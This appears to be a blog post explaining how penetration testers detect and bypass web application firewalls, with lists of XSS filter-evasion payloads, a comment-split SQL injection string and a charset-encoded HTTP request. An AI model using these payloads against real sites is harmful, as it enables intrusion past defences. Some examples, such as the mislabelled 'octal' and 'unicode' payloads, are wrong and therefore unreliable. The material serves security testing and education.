Web Application Firewall (WAF) Bypass Techniques: Explained
In this blog post, we will explore the various tools and methods employed by web application penetration testers and security researchers to bypass web application firewall (WAF) protections successfully.
WAFs are cybersecurity solutions designed to filter and block malicious web traffic. Popular WAF vendors include CloudFlare, AWS, Citrix, Akamai, Radware, Microsoft Azure, and Barracuda.
The techniques for bypassing WAFs may vary depending on the mechanisms utilized by the firewall. WAFs can employ various methods such as regular expressions (regex) to detect malicious traffic. These regex are used to identify patterns in a string of characters. More facts on regex can be located here. Signature-based detection is another approach employed by WAFs, where known malicious strings are assigned a signature stored in a database. The firewall then compares the signature of web traffic against the contents of the database and blocks it if there's a match. Some firewalls also rely on heuristic-based detection.
Identifying WAFs
Manual Identification
WAFs typically block overtly malicious traffic. To trigger a firewall and determine its existence, one can make an HTTP request to the web application with a malicious query in the URL, such as "https://example.com/?p4yl04d3=alert(document.cookie)". The response received from the server may differ from expected, such as the WAF returning its own webpage or a different status code (usually in the 400s).
Additional indications of a firewall can be detected using web proxies, cURL, or the "Network" tab of browser DevTools. These indications include:
- The presence of the WAF name in the Server header (e.g., Server: cloudflare)
- Extra HTTP response headers associated with the WAF (e.g., CF-RAY: xxxxxxxxxxx)
- Cookies that look like set by a WAF (e.G., the reaction header Set-Cookie: __cfduid=xxxxx)
- Unique response codes upon submitting malicious requests (e.g., 412)
Apart from crafting malicious queries to evaluate the response, firewalls can be detected through techniques like sending a FIN/RST TCP packet to the server or implementing a side-channel attack. Analyzing the timing of the firewall against different payloads can also provide hints about the specific WAF being used.
Automated Identification
There are three automated methods for detecting and identifying WAFs:
1. Running an Nmap Scan: The Nmap Scripting Engine (NSE) includes scripts specifically designed to detect and fingerprint firewalls. These scripts can be executed using the following command:
$ nmap --script=http-waf-fingerprint,http-waf-detect -p443 example.com
2. WafW00f: This is a command-line utility that sends commonly flagged payloads to a given domain name and assesses the web server's response to detect and identify the firewall, if possible. The tool can be used with the following command:
$ wafw00f example.com
3. WhatWaf: In addition to detecting a firewall, WhatWaf can attempt to discover a bypass by utilizing tamper scripts and assessing the web server's response to various payloads. The results obtained from WhatWaf are consistent with those from Wafw00f.
Bypassing WAFs
In this section, we will outline some of the potential techniques for bypassing WAFs, along with examples.
1. Bypassing Regex Filters
This technique involves bypassing the regex filtering done by both the WAF and web server. During a black box penetration test, accessing the exact regex used by the WAF might not be possible. If the regex is accessible, this article provides case studies on regex bypass methods.
Common bypass approaches include:
- Changing the case of the payload
- Using various encodings
- Substituting functions or characters
- Using alternative syntax
- Utilizing line breaks or tabs
The examples below demonstrate different approaches:
- <script>alert(XSS) // #removing the closing tag
- <<script>alert(XSS)</script> #prepending an additional "<"
- <sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
- java%0ascript:alert(1) #using encoded newline characters
- <iframe src=http://malicous.com < #double open angle brackets
- <STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra charactersAdditionally, obfuscation can be employed to bypass regex filters. The blog provides an exclusive selection of obfuscation techniques.
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
PayloadsAllTheThings/XSS Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads
XSS Filter Evasion - OWASP Cheat Sheet Series
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
2. Charset Modification
This technique involves modifying the Content-Type header to utilize a different charset (e.g., ibm500). If a WAF is not configured to detect malicious payloads in different encodings, it may not recognize the request as malicious. Charset encoding can be done using Python, as shown in the example provided in the blog.
$ python3
-- snip --
import urllib.parse
s = '<script>alert("xss")</script>'
urllib.parse.quote_plus(s.encode("IBM037"))
'L%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3n'
The encoded string can then be included in the request body or URL and sent to the server.
POST /comment/post HTTP/1.1
Host: chatapp
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 74
%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3
3. Content Size Manipulation
In some cloud-based WAFs, the request may not be thoroughly checked if the payload exceeds a certain size. Exploiting this vulnerability, one can bypass the firewall by increasing the size of the request body or URL.
4. Unicode Compatibility Exploitation
Unicode Compatibility refers to the decomposition of visually distinct characters into the same abstract character. This compatibility allows certain characters to be translated into standard characters despite starting as different characters. By normalizing input with specific Unicode normalization algorithms, unexpected, compatible characters can bypass the WAF and execute as their canonical equivalents on the backend.
Characters are usually normalized through one of the four standard Unicode normalization algorithms: NFC, NFD, NFKC, and NFKD. NFKC and NFKD decompose characters by compatibility, making them effective for bypassing WAFs that do not expect Unicode-compatible characters. The blog includes a PoC example showcasing how this can be achieved.
UAX #15: Unicode Normalization Forms
https://www.unicode.org/reports/tr15/
WAF Bypassing with Unicode Compatibility · Jorge Lajara Website (jlajara.gitlab.io)
https://jlajara.gitlab.io/Bypass_WAF_Unicode
5. The Uninitialized Variables Technique
In command execution scenarios vulnerable to command injection, uninitialized variables can be utilized in payloads as a form of obfuscation to bypass firewalls. Bash treats uninitialized variables as empty strings. When concatenated with a command payload, this can result in the execution of the command payload. The blog references an article that provides further details on this technique.
Web Application Firewall (WAF) Evasion Techniques #3 (secjuice.com)
https://www.secjuice.com/web-application-firewall-waf-evasion/
Conclusion
This blog post explored various tools and techniques used by web application penetration testers and security researchers to bypass WAF protections successfully. By understanding these methods, organizations can enhance their defenses against potential vulnerabilities and strengthen their overall security posture.
0 Comments